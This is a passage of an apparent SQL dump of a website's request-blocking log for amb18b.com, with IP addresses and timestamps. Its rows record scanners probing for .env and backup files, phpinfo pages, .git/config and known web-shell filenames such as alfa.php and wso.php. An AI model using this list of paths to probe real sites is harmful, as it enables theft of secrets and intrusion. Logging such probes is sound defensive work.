12:45:57'),(6989,'https://amb18b.com/app/.env.old','13.40.197.137','Direct Access',1,'2025-11-16 12:45:57','2025-11-16 12:45:57'),(6990,'https://amb18b.com/config/.env','13.40.197.137','Direct Access',1,'2025-11-16 12:45:59','2025-11-16 12:45:59'),(6991,'https://amb18b.com/config/.env.old','13.40.197.137','Direct Access',1,'2025-11-16 12:46:03','2025-11-16 12:46:03'),(6992,'https://amb18b.com/src/.env.save','13.40.197.137','Direct Access',1,'2025-11-16 12:46:03','2025-11-16 12:46:03'),(6993,'https://amb18b.com/src/.env.bak','13.40.197.137','Direct Access',1,'2025-11-16 12:46:03','2025-11-16 12:46:03'),(6994,'https://amb18b.com/src/.env','13.40.197.137','Direct Access',1,'2025-11-16 12:46:03','2025-11-16 12:46:03'),(6995,'https://amb18b.com/src/.env.old','13.40.197.137','Direct Access',1,'2025-11-16 12:46:03','2025-11-16 12:46:03'),(6996,'https://amb18b.com/config/.env.bak','13.40.197.137','Direct Access',1,'2025-11-16 12:46:04','2025-11-16 12:46:04'),(6997,'https://amb18b.com/public/.env.save','13.40.197.137','Direct Access',1,'2025-11-16 12:46:07','2025-11-16 12:46:07'),(6998,'https://amb18b.com/public/.env.old','13.40.197.137','Direct Access',1,'2025-11-16 12:46:07','2025-11-16 12:46:07'),(6999,'https://amb18b.com/public/.env.bak','13.40.197.137','Direct Access',1,'2025-11-16 12:46:07','2025-11-16 12:46:07'),(7000,'https://amb18b.com/includes/.env.save','13.40.197.137','Direct Access',1,'2025-11-16 12:46:07','2025-11-16 12:46:07'),(7001,'https://amb18b.com/public/.env','13.40.197.137','Direct Access',1,'2025-11-16 12:46:07','2025-11-16 12:46:07'),(7002,'https://amb18b.com/lib/.env','13.40.197.137','Direct Access',1,'2025-11-16 12:46:07','2025-11-16 12:46:07'),(7003,'https://amb18b.com/lib/.env.save','13.40.197.137','Direct Access',1,'2025-11-16 12:46:07','2025-11-16 12:46:07'),(7004,'https://amb18b.com/assets/.env.save','13.40.197.137','Direct Access',1,'2025-11-16 12:46:07','2025-11-16 12:46:07'),(7005,'https://amb18b.com/includes/.env','13.40.197.137','Direct Access',1,'2025-11-16 12:46:08','2025-11-16 12:46:08'),(7006,'https://amb18b.com/assets/.env.bak','13.40.197.137','Direct Access',1,'2025-11-16 12:46:08','2025-11-16 12:46:08'),(7007,'https://amb18b.com/includes/.env.bak','13.40.197.137','Direct Access',1,'2025-11-16 12:46:08','2025-11-16 12:46:08'),(7008,'https://amb18b.com/includes/.env.old','13.40.197.137','Direct Access',1,'2025-11-16 12:46:08','2025-11-16 12:46:08'),(7009,'https://amb18b.com/assets/.env','13.40.197.137','Direct Access',1,'2025-11-16 12:46:09','2025-11-16 12:46:09'),(7010,'https://amb18b.com/assets/.env.old','13.40.197.137','Direct Access',1,'2025-11-16 12:46:09','2025-11-16 12:46:09'),(7011,'https://amb18b.com/application/.env.save','13.40.197.137','Direct Access',1,'2025-11-16 12:46:14','2025-11-16 12:46:14'),(7012,'https://amb18b.com/application/.env','13.40.197.137','Direct Access',1,'2025-11-16 12:46:14','2025-11-16 12:46:14'),(7013,'https://amb18b.com/lib/.env.old','13.40.197.137','Direct Access',1,'2025-11-16 12:46:15','2025-11-16 12:46:15'),(7014,'https://amb18b.com/lib/.env.bak','13.40.197.137','Direct Access',1,'2025-11-16 12:46:15','2025-11-16 12:46:15'),(7015,'https://amb18b.com/system/.env','13.40.197.137','Direct Access',1,'2025-11-16 12:46:20','2025-11-16 12:46:20'),(7016,'https://amb18b.com/system/.env.save','13.40.197.137','Direct Access',1,'2025-11-16 12:46:20','2025-11-16 12:46:20'),(7017,'https://amb18b.com/application/.env.bak','13.40.197.137','Direct Access',1,'2025-11-16 12:46:20','2025-11-16 12:46:20'),(7018,'https://amb18b.com/modules/.env','13.40.197.137','Direct Access',1,'2025-11-16 12:46:20','2025-11-16 12:46:20'),(7019,'https://amb18b.com/application/.env.old','13.40.197.137','Direct Access',1,'2025-11-16 12:46:20','2025-11-16 12:46:20'),(7020,'https://amb18b.com/system/.env.bak','13.40.197.137','Direct Access',1,'2025-11-16 12:46:21','2025-11-16 12:46:21'),(7021,'https://amb18b.com/core/.env.save','13.40.197.137','Direct Access',1,'2025-11-16 12:46:21','2025-11-16 12:46:21'),(7022,'https://amb18b.com/core/.env.old','13.40.197.137','Direct Access',1,'2025-11-16 12:46:21','2025-11-16 12:46:21'),(7023,'https://amb18b.com/system/.env.old','13.40.197.137','Direct Access',1,'2025-11-16 12:46:21','2025-11-16 12:46:21'),(7024,'https://amb18b.com/modules/.env.old','13.40.197.137','Direct Access',1,'2025-11-16 12:46:21','2025-11-16 12:46:21'),(7025,'https://amb18b.com/plugins/.env','13.40.197.137','Direct Access',1,'2025-11-16 12:46:21','2025-11-16 12:46:21'),(7026,'https://amb18b.com/core/.env','13.40.197.137','Direct Access',1,'2025-11-16 12:46:21','2025-11-16 12:46:21'),(7027,'https://amb18b.com/modules/.env.save','13.40.197.137','Direct Access',1,'2025-11-16 12:46:21','2025-11-16 12:46:21'),(7028,'https://amb18b.com/plugins/.env.save','13.40.197.137','Direct Access',1,'2025-11-16 12:46:21','2025-11-16 12:46:21'),(7029,'https://amb18b.com/core/.env.bak','13.40.197.137','Direct Access',1,'2025-11-16 12:46:21','2025-11-16 12:46:21'),(7030,'https://amb18b.com/modules/.env.bak','13.40.197.137','Direct Access',1,'2025-11-16 12:46:21','2025-11-16 12:46:21'),(7031,'https://amb18b.com/themes/.env.bak','13.40.197.137','Direct Access',1,'2025-11-16 12:46:50','2025-11-16 12:46:50'),(7032,'https://amb18b.com/themes/.env.old','13.40.197.137','Direct Access',1,'2025-11-16 12:46:50','2025-11-16 12:46:50'),(7033,'https://amb18b.com/themes/.env.save','13.40.197.137','Direct Access',1,'2025-11-16 12:46:50','2025-11-16 12:46:50'),(7034,'https://amb18b.com/plugins/.env.bak','13.40.197.137','Direct Access',1,'2025-11-16 12:46:50','2025-11-16 12:46:50'),(7035,'https://amb18b.com/themes/.env','13.40.197.137','Direct Access',1,'2025-11-16 12:46:50','2025-11-16 12:46:50'),(7036,'https://amb18b.com/plugins/.env.old','13.40.197.137','Direct Access',1,'2025-11-16 12:46:51','2025-11-16 12:46:51'),(7037,'https://amb18b.com/vendor/.env.old','13.40.197.137','Direct Access',1,'2025-11-16 12:47:04','2025-11-16 12:47:04'),(7038,'https://amb18b.com/storage/.env.old','13.40.197.137','Direct Access',1,'2025-11-16 12:47:04','2025-11-16 12:47:04'),(7039,'https://amb18b.com/test.php','13.40.197.137','Direct Access',1,'2025-11-16 12:47:04','2025-11-16 12:47:04'),(7040,'https://amb18b.com/vendor/.env','13.40.197.137','Direct Access',1,'2025-11-16 12:47:04','2025-11-16 12:47:04'),(7041,'https://amb18b.com/storage/.env.save','13.40.197.137','Direct Access',1,'2025-11-16 12:47:04','2025-11-16 12:47:04'),(7042,'https://amb18b.com/info.php','13.40.197.137','Direct Access',1,'2025-11-16 12:47:04','2025-11-16 12:47:04'),(7043,'https://amb18b.com/vendor/.env.save','13.40.197.137','Direct Access',1,'2025-11-16 12:47:05','2025-11-16 12:47:05'),(7044,'https://amb18b.com/storage/.env.bak','13.40.197.137','Direct Access',1,'2025-11-16 12:47:05','2025-11-16 12:47:05'),(7045,'https://amb18b.com/pi.php','13.40.197.137','Direct Access',1,'2025-11-16 12:47:05','2025-11-16 12:47:05'),(7046,'https://amb18b.com/vendor/.env.bak','13.40.197.137','Direct Access',1,'2025-11-16 12:47:05','2025-11-16 12:47:05'),(7047,'https://amb18b.com/php_info.php','13.40.197.137','Direct Access',1,'2025-11-16 12:47:05','2025-11-16 12:47:05'),(7048,'https://amb18b.com/storage/.env','13.40.197.137','Direct Access',1,'2025-11-16 12:47:05','2025-11-16 12:47:05'),(7049,'https://amb18b.com/i.php','13.40.197.137','Direct Access',1,'2025-11-16 12:47:05','2025-11-16 12:47:05'),(7050,'https://amb18b.com/php.php','13.40.197.137','Direct Access',1,'2025-11-16 12:47:05','2025-11-16 12:47:05'),(7051,'https://amb18b.com/_profiler/phpinfo','13.40.197.137','Direct Access',1,'2025-11-16 12:47:05','2025-11-16 12:47:05'),(7052,'https://amb18b.com/phpinfo.php','13.40.197.137','Direct Access',1,'2025-11-16 12:47:05','2025-11-16 12:47:05'),(7053,'https://amb18b.com/info2.php','13.40.197.137','Direct Access',1,'2025-11-16 12:47:05','2025-11-16 12:47:05'),(7054,'https://amb18b.com/phpinfo','13.40.197.137','Direct Access',1,'2025-11-16 12:47:06','2025-11-16 12:47:06'),(7055,'https://amb18b.com/info1.php','13.40.197.137','Direct Access',1,'2025-11-16 12:47:06','2025-11-16 12:47:06'),(7056,'https://amb18b.com/server.php','13.40.197.137','Direct Access',1,'2025-11-16 12:47:09','2025-11-16 12:47:09'),(7057,'https://amb18b.com/phpversion.php','13.40.197.137','Direct Access',1,'2025-11-16 12:47:10','2025-11-16 12:47:10'),(7058,'https://amb18b.com/serverinfo.php','13.40.197.137','Direct Access',1,'2025-11-16 12:47:10','2025-11-16 12:47:10'),(7059,'https://amb18b.com/php_version.php','13.40.197.137','Direct Access',1,'2025-11-16 12:47:10','2025-11-16 12:47:10'),(7060,'https://amb18b.com/diagnostic.php','13.40.197.137','Direct Access',1,'2025-11-16 12:47:21','2025-11-16 12:47:21'),(7061,'https://amb18b.com/info.php.save','13.40.197.137','Direct Access',1,'2025-11-16 12:47:21','2025-11-16 12:47:21'),(7062,'https://amb18b.com/phptest.php','13.40.197.137','Direct Access',1,'2025-11-16 12:47:22','2025-11-16 12:47:22'),(7063,'https://amb18b.com/debug.php','13.40.197.137','Direct Access',1,'2025-11-16 12:47:22','2025-11-16 12:47:22'),(7064,'https://amb18b.com/php_info.php.save','13.40.197.137','Direct Access',1,'2025-11-16 12:47:22','2025-11-16 12:47:22'),(7065,'https://amb18b.com/check.php','13.40.197.137','Direct Access',1,'2025-11-16 12:47:22','2025-11-16 12:47:22'),(7066,'https://amb18b.com/test.php.save','13.40.197.137','Direct Access',1,'2025-11-16 12:47:23','2025-11-16 12:47:23'),(7067,'https://amb18b.com/phpinfo.php.save','13.40.197.137','Direct Access',1,'2025-11-16 12:47:24','2025-11-16 12:47:24'),(7068,'https://amb18b.com/php_info.php.bak','13.40.197.137','Direct Access',1,'2025-11-16 12:47:24','2025-11-16 12:47:24'),(7069,'https://amb18b.com/phpinfo.php.bak','13.40.197.137','Direct Access',1,'2025-11-16 12:47:24','2025-11-16 12:47:24'),(7070,'https://amb18b.com/info.php.bak','13.40.197.137','Direct Access',1,'2025-11-16 12:47:25','2025-11-16 12:47:25'),(7071,'https://amb18b.com/test.php.bak','13.40.197.137','Direct Access',1,'2025-11-16 12:47:25','2025-11-16 12:47:25'),(7072,'https://amb18b.com/phpinfo.php.old','13.40.197.137','Direct Access',1,'2025-11-16 12:47:28','2025-11-16 12:47:28'),(7073,'https://amb18b.com/php_info.php.old','13.40.197.137','Direct Access',1,'2025-11-16 12:47:28','2025-11-16 12:47:28'),(7074,'https://amb18b.com/phpinfo.php.orig','13.40.197.137','Direct Access',1,'2025-11-16 12:47:28','2025-11-16 12:47:28'),(7075,'https://amb18b.com/info.php.old','13.40.197.137','Direct Access',1,'2025-11-16 12:47:28','2025-11-16 12:47:28'),(7076,'https://amb18b.com/test.php.old','13.40.197.137','Direct Access',1,'2025-11-16 12:47:28','2025-11-16 12:47:28'),(7077,'https://amb18b.com/php_info.php.backup','13.40.197.137','Direct Access',1,'2025-11-16 12:47:40','2025-11-16 12:47:40'),(7078,'https://amb18b.com/test.php.orig','13.40.197.137','Direct Access',1,'2025-11-16 12:47:40','2025-11-16 12:47:40'),(7079,'https://amb18b.com/phpinfo.php~','13.40.197.137','Direct Access',1,'2025-11-16 12:47:41','2025-11-16 12:47:41'),(7080,'https://amb18b.com/info.php.orig','13.40.197.137','Direct Access',1,'2025-11-16 12:47:41','2025-11-16 12:47:41'),(7081,'https://amb18b.com/info.php.backup','13.40.197.137','Direct Access',1,'2025-11-16 12:47:41','2025-11-16 12:47:41'),(7082,'https://amb18b.com/php_info.php.orig','13.40.197.137','Direct Access',1,'2025-11-16 12:47:41','2025-11-16 12:47:41'),(7083,'https://amb18b.com/phpinfo.php.backup','13.40.197.137','Direct Access',1,'2025-11-16 12:47:41','2025-11-16 12:47:41'),(7084,'https://amb18b.com/info.php~','13.40.197.137','Direct Access',1,'2025-11-16 12:47:42','2025-11-16 12:47:42'),(7085,'https://amb18b.com/php_info.php~','13.40.197.137','Direct Access',1,'2025-11-16 12:47:43','2025-11-16 12:47:43'),(7086,'https://amb18b.com/test.php~','13.40.197.137','Direct Access',1,'2025-11-16 12:47:43','2025-11-16 12:47:43'),(7087,'https://amb18b.com/test.php.backup','13.40.197.137','Direct Access',1,'2025-11-16 12:47:43','2025-11-16 12:47:43'),(7088,'https://amb18b.com/phpinfo.php.swp','13.40.197.137','Direct Access',1,'2025-11-16 12:47:43','2025-11-16 12:47:43'),(7089,'https://amb18b.com/info.php.swp','13.40.197.137','Direct Access',1,'2025-11-16 12:47:43','2025-11-16 12:47:43'),(7090,'https://amb18b.com/php_info.php.swp','13.40.197.137','Direct Access',1,'2025-11-16 12:47:45','2025-11-16 12:47:45'),(7091,'https://amb18b.com/info.php.tmp','13.40.197.137','Direct Access',1,'2025-11-16 12:47:45','2025-11-16 12:47:45'),(7092,'https://amb18b.com/phpinfo.php.tmp','13.40.197.137','Direct Access',1,'2025-11-16 12:47:45','2025-11-16 12:47:45'),(7093,'https://amb18b.com/test.php.tmp','13.40.197.137','Direct Access',1,'2025-11-16 12:47:45','2025-11-16 12:47:45'),(7094,'https://amb18b.com/test.php.swp','13.40.197.137','Direct Access',1,'2025-11-16 12:47:45','2025-11-16 12:47:45'),(7095,'https://amb18b.com/php_info.php.tmp','13.40.197.137','Direct Access',1,'2025-11-16 12:47:46','2025-11-16 12:47:46'),(7096,'https://amb18b.com/admin/phpinfo.php','13.40.197.137','Direct Access',1,'2025-11-16 12:47:50','2025-11-16 12:47:50'),(7097,'https://amb18b.com/admin/info.php','13.40.197.137','Direct Access',1,'2025-11-16 12:47:51','2025-11-16 12:47:51'),(7098,'https://amb18b.com/dev/phpinfo.php','13.40.197.137','Direct Access',1,'2025-11-16 12:47:51','2025-11-16 12:47:51'),(7099,'https://amb18b.com/tmp/phpinfo.php','13.40.197.137','Direct Access',1,'2025-11-16 12:47:51','2025-11-16 12:47:51'),(7100,'https://amb18b.com/test/phpinfo.php','13.40.197.137','Direct Access',1,'2025-11-16 12:47:51','2025-11-16 12:47:51'),(7101,'https://amb18b.com/test/phpinfo.php.save','13.40.197.137','Direct Access',1,'2025-11-16 12:47:51','2025-11-16 12:47:51'),(7102,'https://amb18b.com/admin/phpinfo.php.save','13.40.197.137','Direct Access',1,'2025-11-16 12:47:52','2025-11-16 12:47:52'),(7103,'https://amb18b.com/test/info.php','13.40.197.137','Direct Access',1,'2025-11-16 12:47:53','2025-11-16 12:47:53'),(7104,'https://amb18b.com/dev/info.php.save','13.40.197.137','Direct Access',1,'2025-11-16 12:47:53','2025-11-16 12:47:53'),(7105,'https://amb18b.com/test/info.php.save','13.40.197.137','Direct Access',1,'2025-11-16 12:47:53','2025-11-16 12:47:53'),(7106,'https://amb18b.com/admin/info.php.save','13.40.197.137','Direct Access',1,'2025-11-16 12:47:54','2025-11-16 12:47:54'),(7107,'https://amb18b.com/dev/info.php','13.40.197.137','Direct Access',1,'2025-11-16 12:47:54','2025-11-16 12:47:54'),(7108,'https://amb18b.com/dev/phpinfo.php.save','13.40.197.137','Direct Access',1,'2025-11-16 12:47:55','2025-11-16 12:47:55'),(7109,'https://amb18b.com/site/info.php','13.40.197.137','Direct Access',1,'2025-11-16 12:48:10','2025-11-16 12:48:10'),(7110,'https://amb18b.com/www/info.php.save','13.40.197.137','Direct Access',1,'2025-11-16 12:48:10','2025-11-16 12:48:10'),(7111,'https://amb18b.com/scripts/info.php.save','13.40.197.137','Direct Access',1,'2025-11-16 12:48:10','2025-11-16 12:48:10'),(7112,'https://amb18b.com/.git/config','13.40.197.137','Direct Access',1,'2025-11-16 12:48:10','2025-11-16 12:48:10'),(7113,'https://amb18b.com/includes/info.php.save','13.40.197.137','Direct Access',1,'2025-11-16 12:48:10','2025-11-16 12:48:10'),(7114,'https://amb18b.com/site/info.php.save','13.40.197.137','Direct Access',1,'2025-11-16 12:48:10','2025-11-16 12:48:10'),(7115,'https://amb18b.com/cgi-bin/info.php','13.40.197.137','Direct Access',1,'2025-11-16 12:48:10','2025-11-16 12:48:10'),(7116,'https://amb18b.com/includes/phpinfo.php.save','13.40.197.137','Direct Access',1,'2025-11-16 12:48:11','2025-11-16 12:48:11'),(7117,'https://amb18b.com/tmp/phpinfo.php.save','13.40.197.137','Direct Access',1,'2025-11-16 12:48:11','2025-11-16 12:48:11'),(7118,'https://amb18b.com/public/info.php.save','13.40.197.137','Direct Access',1,'2025-11-16 12:48:11','2025-11-16 12:48:11'),(7119,'https://amb18b.com/public/phpinfo.php','13.40.197.137','Direct Access',1,'2025-11-16 12:48:11','2025-11-16 12:48:11'),(7120,'https://amb18b.com/tmp/info.php','13.40.197.137','Direct Access',1,'2025-11-16 12:48:11','2025-11-16 12:48:11'),(7121,'https://amb18b.com/www/phpinfo.php.save','13.40.197.137','Direct Access',1,'2025-11-16 12:48:11','2025-11-16 12:48:11'),(7122,'https://amb18b.com/web/phpinfo.php','13.40.197.137','Direct Access',1,'2025-11-16 12:48:11','2025-11-16 12:48:11'),(7123,'https://amb18b.com/tmp/info.php.save','13.40.197.137','Direct Access',1,'2025-11-16 12:48:12','2025-11-16 12:48:12'),(7124,'https://amb18b.com/site/phpinfo.php.save','13.40.197.137','Direct Access',1,'2025-11-16 12:48:12','2025-11-16 12:48:12'),(7125,'https://amb18b.com/scripts/phpinfo.php.save','13.40.197.137','Direct Access',1,'2025-11-16 12:48:12','2025-11-16 12:48:12'),(7126,'https://amb18b.com/cgi-bin/phpinfo.php','13.40.197.137','Direct Access',1,'2025-11-16 12:48:12','2025-11-16 12:48:12'),(7127,'https://amb18b.com/site/phpinfo.php','13.40.197.137','Direct Access',1,'2025-11-16 12:48:12','2025-11-16 12:48:12'),(7128,'https://amb18b.com/cgi-bin/info.php.save','13.40.197.137','Direct Access',1,'2025-11-16 12:48:12','2025-11-16 12:48:12'),(7129,'https://amb18b.com/www/phpinfo.php','13.40.197.137','Direct Access',1,'2025-11-16 12:48:13','2025-11-16 12:48:13'),(7130,'https://amb18b.com/web/phpinfo.php.save','13.40.197.137','Direct Access',1,'2025-11-16 12:48:13','2025-11-16 12:48:13'),(7131,'https://amb18b.com/www/info.php','13.40.197.137','Direct Access',1,'2025-11-16 12:48:13','2025-11-16 12:48:13'),(7132,'https://amb18b.com/web/info.php','13.40.197.137','Direct Access',1,'2025-11-16 12:48:13','2025-11-16 12:48:14'),(7133,'https://amb18b.com/includes/info.php','13.40.197.137','Direct Access',1,'2025-11-16 12:48:14','2025-11-16 12:48:14'),(7134,'https://amb18b.com/scripts/info.php','13.40.197.137','Direct Access',1,'2025-11-16 12:48:14','2025-11-16 12:48:14'),(7135,'https://amb18b.com/web/info.php.save','13.40.197.137','Direct Access',1,'2025-11-16 12:48:14','2025-11-16 12:48:14'),(7136,'https://amb18b.com/public/phpinfo.php.save','13.40.197.137','Direct Access',1,'2025-11-16 12:48:14','2025-11-16 12:48:14'),(7137,'https://amb18b.com/public/info.php','13.40.197.137','Direct Access',1,'2025-11-16 12:48:14','2025-11-16 12:48:14'),(7138,'https://amb18b.com/cgi-bin/phpinfo.php.save','13.40.197.137','Direct Access',1,'2025-11-16 12:48:14','2025-11-16 12:48:14'),(7139,'https://amb18b.com/includes/phpinfo.php','13.40.197.137','Direct Access',1,'2025-11-16 12:48:14','2025-11-16 12:48:14'),(7140,'https://amb18b.com/scripts/phpinfo.php','13.40.197.137','Direct Access',1,'2025-11-16 12:48:14','2025-11-16 12:48:14'),(7141,'https://amb18b.com/wp-includes/images/include.php','220.247.224.162','Direct Access',1,'2025-11-16 12:57:56','2025-11-16 12:57:56'),(7142,'https://amb18b.com/wp-includes/widgets/include.php','220.247.224.162','Direct Access',1,'2025-11-16 12:57:57','2025-11-16 12:57:57'),(7143,'https://amb18b.com/wp-includes/images/hello_dolly_v2.php','220.247.224.162','Direct Access',1,'2025-11-16 12:58:14','2025-11-16 12:58:14'),(7144,'https://amb18b.com/wp-includes/widgets/hello_dolly_v2.php','220.247.224.162','Direct Access',1,'2025-11-16 12:58:16','2025-11-16 12:58:16'),(7145,'https://amb18b.com/.git/config','68.183.51.160','Direct Access',2,'2025-11-16 14:27:33','2025-11-16 13:32:17'),(7146,'https://amb18b.com/.git/config','68.183.51.160','Direct Access',2,'2025-11-16 14:27:36','2025-11-16 13:32:26'),(7147,'https://amb18b.com/style.php','4.232.179.163','Invalid Referrer',1,'2025-11-16 15:47:20','2025-11-16 15:47:20'),(7148,'https://amb18b.com/style.php','4.232.179.163','Invalid Referrer',1,'2025-11-16 15:47:30','2025-11-16 15:47:30'),(7149,'https://amb18b.com/link.php','130.33.24.148','Direct Access',2,'2025-11-16 16:25:31','2025-11-16 16:24:53'),(7150,'https://amb18b.com/chosen.php?p=','130.33.24.148','Direct Access',1,'2025-11-16 16:24:55','2025-11-16 16:24:55'),(7151,'https://amb18b.com/mail.php','130.33.24.148','Direct Access',1,'2025-11-16 16:24:56','2025-11-16 16:24:56'),(7152,'https://amb18b.com/lock360.php','130.33.24.148','Direct Access',1,'2025-11-16 16:24:57','2025-11-16 16:24:57'),(7153,'https://amb18b.com/function.php','130.33.24.148','Direct Access',1,'2025-11-16 16:24:58','2025-11-16 16:24:58'),(7154,'https://amb18b.com/classwithtostring.php','130.33.24.148','Direct Access',1,'2025-11-16 16:24:59','2025-11-16 16:24:59'),(7155,'https://amb18b.com/1.php','130.33.24.148','Direct Access',1,'2025-11-16 16:25:01','2025-11-16 16:25:01'),(7156,'https://amb18b.com/autoload_classmap.php?p=','130.33.24.148','Direct Access',1,'2025-11-16 16:25:02','2025-11-16 16:25:02'),(7157,'https://amb18b.com/post.php','130.33.24.148','Direct Access',1,'2025-11-16 16:25:04','2025-11-16 16:25:04'),(7158,'https://amb18b.com/wp-conflg.php?p=','130.33.24.148','Direct Access',1,'2025-11-16 16:25:06','2025-11-16 16:25:06'),(7159,'https://amb18b.com/manager.php?p=','130.33.24.148','Direct Access',1,'2025-11-16 16:25:07','2025-11-16 16:25:07'),(7160,'https://amb18b.com/alfa.php','130.33.24.148','Direct Access',1,'2025-11-16 16:25:08','2025-11-16 16:25:08'),(7161,'https://amb18b.com/goods.php','130.33.24.148','Direct Access',1,'2025-11-16 16:25:09','2025-11-16 16:25:09'),(7162,'https://amb18b.com/wp-trackback.php','130.33.24.148','Direct Access',1,'2025-11-16 16:25:10','2025-11-16 16:25:10'),(7163,'https://amb18b.com/about.php?p=','130.33.24.148','Direct Access',1,'2025-11-16 16:25:11','2025-11-16 16:25:11'),(7164,'https://amb18b.com/themes.php','130.33.24.148','Direct Access',1,'2025-11-16 16:25:12','2025-11-16 16:25:12'),(7165,'https://amb18b.com/simple.php','130.33.24.148','Direct Access',1,'2025-11-16 16:25:14','2025-11-16 16:25:14'),(7166,'https://amb18b.com/class.php?p=','130.33.24.148','Direct Access',1,'2025-11-16 16:25:16','2025-11-16 16:25:16'),(7167,'https://amb18b.com/as.php','130.33.24.148','Direct Access',1,'2025-11-16 16:25:18','2025-11-16 16:25:18'),(7168,'https://amb18b.com/file.php','130.33.24.148','Direct Access',1,'2025-11-16 16:25:19','2025-11-16 16:25:19'),(7169,'https://amb18b.com/bless.php','130.33.24.148','Direct Access',1,'2025-11-16 16:25:20','2025-11-16 16:25:20'),(7170,'https://amb18b.com/alfanew.php','130.33.24.148','Direct Access',2,'2025-11-16 16:26:12','2025-11-16 16:25:21'),(7171,'https://amb18b.com/404.php?fm=true','130.33.24.148','Direct Access',1,'2025-11-16 16:25:22','2025-11-16 16:25:22'),(7172,'https://amb18b.com/ini.php','130.33.24.148','Direct Access',1,'2025-11-16 16:25:24','2025-11-16 16:25:24'),(7173,'https://amb18b.com/fm.php?p=','130.33.24.148','Direct Access',1,'2025-11-16 16:25:25','2025-11-16 16:25:25'),(7174,'https://amb18b.com/atomlib.php','130.33.24.148','Direct Access',1,'2025-11-16 16:25:26','2025-11-16 16:25:26'),(7175,'https://amb18b.com/inputs.php?p=','130.33.24.148','Direct Access',1,'2025-11-16 16:25:27','2025-11-16 16:25:27'),(7176,'https://amb18b.com/moon.php?p=','130.33.24.148','Direct Access',1,'2025-11-16 16:25:28','2025-11-16 16:25:28'),(7177,'https://amb18b.com/lv.php','130.33.24.148','Direct Access',2,'2025-11-16 16:26:11','2025-11-16 16:25:29'),(7178,'https://amb18b.com/cong.php','130.33.24.148','Direct Access',1,'2025-11-16 16:25:30','2025-11-16 16:25:30'),(7179,'https://amb18b.com/buy.php','130.33.24.148','Direct Access',1,'2025-11-16 16:25:32','2025-11-16 16:25:32'),(7180,'https://amb18b.com/zfile.php','130.33.24.148','Direct Access',1,'2025-11-16 16:25:34','2025-11-16 16:25:34'),(7181,'https://amb18b.com/css.php','130.33.24.148','Direct Access',1,'2025-11-16 16:25:35','2025-11-16 16:25:35'),(7182,'https://amb18b.com/radio.php','130.33.24.148','Direct Access',1,'2025-11-16 16:25:36','2025-11-16 16:25:36'),(7183,'https://amb18b.com/wp.php','130.33.24.148','Direct Access',1,'2025-11-16 16:25:37','2025-11-16 16:25:37'),(7184,'https://amb18b.com/abcd.php','130.33.24.148','Direct Access',1,'2025-11-16 16:25:38','2025-11-16 16:25:38'),(7185,'https://amb18b.com/nc4.php','130.33.24.148','Direct Access',1,'2025-11-16 16:25:39','2025-11-16 16:25:39'),(7186,'https://amb18b.com/wso.php','130.33.24.148','Direct Access',1,'2025-11-16 16:25:40','2025-11-16 16:25:40'),(7187,'https://amb18b.com/rss.php','130.33.24.148','Direct Access',1,'2025-11-16 16:25:41','2025-11-16 16:25:41'),(7188,'https://amb18b.com/ant.php','130.33.24.148','Direct Access',1,'2025-11-16 16:25:44','2025-11-16 16:25:44'),(7189,'https://amb18b.com/ioxi-o.php','130.33.24.148','Direct Access',1,'2025-11-16 16:25:45','2025-11-16 16:25:45'),(7190,'https://amb18b.com/wpc.php?p=','130.33.24.148','Direct Access',1,'2025-11-16 16:25:46','2025-11-16 16:25:46'),(7191,'https://amb18b.com/js.php','130.33.24.148','Direct Access',1,'2025-11-16 16:25:48','2025-11-16 16:25:48'),(7192,'https://amb18b.com/ar.php','130.33.24.148','Direct Access',1,'2025-11-16 16:25:49','2025-11-16 16:25:49'),(7193,'https://amb18b.com/xmrlpc.php?p=','130.33.24.148','Direct Access',1,'2025-11-16 16:25:50','2025-11-16 16:25:50'),(7194,'https://amb18b.com/c.php','130.33.24.148','Direct Access',1,'2025-11-16 16:25:52','2025-11-16 16:25:52'),(7195,'https://amb18b.com/byp.php','130.33.24.148','Direct Access',1,'2025-11-16 16:25:53','2025-11-16 16:25:53'),(7196,'https://amb18b.com/fm1.php','130.33.24.148','Direct Access',1,'2025-11-16 16:25:54','2025-11-16 16:25:54'),(7197,'https://amb18b.com/doc.php','130.33.24.148','Direct Access',1,'2025-11-16 16:25:55','2025-11-16 16:25:55'),(7198,'https://amb18b.com/Angelv2.php','130.33.24.148','Direct Access',1,'2025-11-16 16:25:56','2025-11-16 16:25:56'),(7199,'https://amb18b.com/acp.php','130.33.24.148','Direct Access',1,'2025-11-16 16:25:57','2025-11-16 16:25:57'),(7200,'https://amb18b.com/gdn.php','130.33.24.148','Direct Access',1,'2025-11-16 16:25:58','2025-11-16 16:25:58'),(7201,'https://amb18b.com/asas.php','130.33.24.148','Direct Access',1,'2025-11-16 16:25:59','2025-11-16 16:25:59'),(7202,'https://amb18b.com/123.php','130.33.24.148','Direct Access',1,'2025-11-16 16:26:01','2025-11-16 16:26:01'),(7203,'https://amb18b.com/v1.php','130.33.24.148','Direct Access',1,'2025-11-16 16:26:02','2025-11-16 16:26:02'),(7204,'https://amb18b.com/v2.php','130.33.24.148','Direct Access',1,'2025-11-16 16:26:03','2025-11-16 16:26:03'),(7205,'https://amb18b.com/rk2.php','130.33.24.148','Direct Access',1,'2025-11-16 16:26:05','2025-11-16 16:26:05'),(7206,'https://amb18b.com/222.php?p=','130.33.24.148','Direct Access',1,'2025-11-16 16:26:06','2025-11-16 16:26:06'),(7207,'https://amb18b.com/wp-22.php','130.33.24.148','Direct Access',1,'2025-11-16 16:26:07','2025-11-16 16:26:07'),(7208,'https://amb18b.com/lc.php','130.33.24.148','Direct Access',1,'2025-11-16 16:26:08','2025-11-16 16:26:08'),(7209,'https://amb18b.com/mini.php','130.33.24.148','Direct Access',1,'2025-11-16 16:26:10','2025-11-16 16:26:10'),(7210,'https://amb18b.com/m.php','130.33.24.148','Direct Access',1,'2025-11-16 16:26:14','2025-11-16 16:26:14'),(7211,'https://amb18b.com/db.php','130.33.24.148','Direct Access',1,'2025-11-16 16:26:15','2025-11-16 16:26:15'),(7212,'https://amb18b.com/aks.php','130.33.24.148','Direct Access',1,'2025-11-16 16:26:16','2025-11-16 16:26:16'),(7213,'https://amb18b.com/f.php','130.33.24.148','Direct Access',1,'2025-11-16 16:26:17','2025-11-16 16:26:17'),(7214,'https://amb18b.com/wp-files.php','130.33.24.148','Direct Access',1,'2025-11-16 16:26:18','2025-11-16 16:26:18'),(7215,'https://amb18b.com/cloud.php','130.33.24.148','Direct Access',1,'2025-11-16 16:26:19','2025-11-16 16:26:19'),(7216,'https://amb18b.com/asa.php','130.33.24.148','Direct Access',1,'2025-11-16 16:26:21','2025-11-16 